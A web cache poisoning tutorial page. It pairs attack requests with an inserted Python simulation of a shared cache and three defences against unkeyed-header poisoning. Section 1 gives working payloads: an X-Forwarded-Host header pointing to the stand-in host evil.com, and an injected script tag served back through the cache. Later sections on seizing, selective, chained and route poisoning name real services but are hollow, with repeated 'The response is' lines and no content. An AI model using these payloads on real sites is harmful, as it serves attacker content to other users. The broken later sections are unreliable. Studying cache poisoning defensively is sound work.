Web Cache Poisoning

How to exploit

  1. Basic poisoning

GET / HTTP/1.1
Host: www.vuln.com
X-Forwarded-Host: evil.com

The response is

HTTP/1.1 200 OK
Cache-Control: public, no-cache
…
<img src="https://evil.com/a.png" />

Or you can inject an XSS payload instead of a hostname:

GET / HTTP/1.1
Host: www.vuln.com
X-Forwarded-Host: a."><script>alert(1)</script>

The response is

HTTP/1.1 200 OK
Cache-Control: public, no-cache
…
<img src="https://a."><script>alert(1)</script>a.png" />
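
The mechanism behind the two requests above, as an added example that is not part of the original page: a toy shared cache sits in front of an origin that builds an absolute image URL from X-Forwarded-Host, exactly the pattern shown. The cache keys only on Host and path, so the header is unkeyed: the attacker's request fills the cache entry and every later visitor receives the attacker-controlled host. The same harness then shows three defences, keying the header, stripping it before forwarding, and an origin that ignores forwarded hosts and escapes what it does emit. All hosts, requests and the allow-list are constructed for the example.

```python
# Added example, not code from the original page. Models a shared cache with a
# configurable cache key in front of an origin, to show why an input the cache
# does not key on but the origin uses poisons responses for later visitors.
import html

# Constructed requests: the attacker's primes the cache, the victim's is clean.
# Header names are treated case-sensitively here for simplicity.
ATTACKER_REQ = {"path": "/", "headers": {"Host": "www.vuln.com",
                                          "X-Forwarded-Host": "evil.com"}}
VICTIM_REQ = {"path": "/", "headers": {"Host": "www.vuln.com"}}

# Constructed configuration for the hardened origin (assumption, not on the page).
ALLOWED_HOSTS = {"www.vuln.com"}
CANONICAL_HOST = "www.vuln.com"


def reflecting_origin(req):
    """Origin from the page's scenario: builds the image URL from
    X-Forwarded-Host (falling back to Host) without any escaping."""
    host = req["headers"].get("X-Forwarded-Host", req["headers"]["Host"])
    body = f'<img src="https://{host}/a.png" />'
    return {"status": 200, "headers": {"Cache-Control": "public, no-cache"},
            "body": body}


def hardened_origin(req):
    """Only trusts Host when it is on an allow-list, never looks at
    X-Forwarded-Host for URL generation, and escapes the attribute value
    so a crafted value cannot break out of it."""
    host = req["headers"].get("Host", "")
    if host not in ALLOWED_HOSTS:
        host = CANONICAL_HOST
    body = f'<img src="https://{html.escape(host, quote=True)}/a.png" />'
    return {"status": 200, "headers": {"Cache-Control": "public, no-cache"},
            "body": body}


class Cache:
    """Shared cache. key_fn decides which request parts form the cache key;
    strip names headers removed before forwarding to the origin. Like the
    cache in the page's example it stores the response despite no-cache."""

    def __init__(self, origin, key_fn, strip=()):
        self.origin, self.key_fn, self.strip = origin, key_fn, frozenset(strip)
        self.store = {}

    def fetch(self, req):
        key = self.key_fn(req)
        if key in self.store:
            return self.store[key], True          # cache hit
        forwarded = {"path": req["path"],
                     "headers": {k: v for k, v in req["headers"].items()
                                 if k not in self.strip}}
        resp = self.origin(forwarded)
        self.store[key] = resp
        return resp, False                        # cache miss, now stored


def key_host_path(req):
    """The weak key: X-Forwarded-Host is unkeyed."""
    return (req["headers"]["Host"], req["path"])


def key_host_path_xfh(req):
    """Key that includes the header, so each value gets its own entry."""
    return (req["headers"]["Host"], req["path"],
            req["headers"].get("X-Forwarded-Host", ""))


def victim_sees_attacker_host(cache):
    """Attacker primes the cache, then a clean victim request arrives.
    Returns True when the attacker's host reaches the victim."""
    cache.fetch(ATTACKER_REQ)
    resp, _hit = cache.fetch(VICTIM_REQ)
    return "evil.com" in resp["body"]


def run_scenarios():
    """Vulnerable setup beside the three defences."""
    return {
        "vulnerable": victim_sees_attacker_host(
            Cache(reflecting_origin, key_host_path)),
        "header_in_key": victim_sees_attacker_host(
            Cache(reflecting_origin, key_host_path_xfh)),
        "header_stripped": victim_sees_attacker_host(
            Cache(reflecting_origin, key_host_path, strip={"X-Forwarded-Host"})),
        "origin_hardened": victim_sees_attacker_host(
            Cache(hardened_origin, key_host_path)),
    }


if __name__ == "__main__":
    for name, poisoned in run_scenarios().items():
        print(f"{name:16s} victim poisoned: {poisoned}")
```

Keying the header is the weakest of the three fixes: the poisoned entry still exists, it is just only served to requests carrying the same header value. Stripping unrecognised headers at the cache, or an origin that never derives URLs from request headers, removes the poisoned response altogether.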

  2. Seizing the Cache

The response is

  3. Selective poisoning

The response is

  4. Chaining Unkeyed Inputs

  • First step

The response is

  • Second step

The response is

  • Third step

The response is

  5. Route Poisoning

The response is

To exploit this, we need to go to hubspot.com, register ourselves as a HubSpot client, place a payload on our HubSpot page, and then finally trick HubSpot into serving this response on goodhire.com.

The response is

  6. Hidden Route Poisoning

The response is

When a user first registers a blog with Ghost, it issues them with a unique subdomain under ghost.io. Once a blog is up and running, the user can define an arbitrary custom domain like blog.cloudflare.com. If a user has defined a custom domain, their ghost.io subdomain will simply redirect to it:

The response is
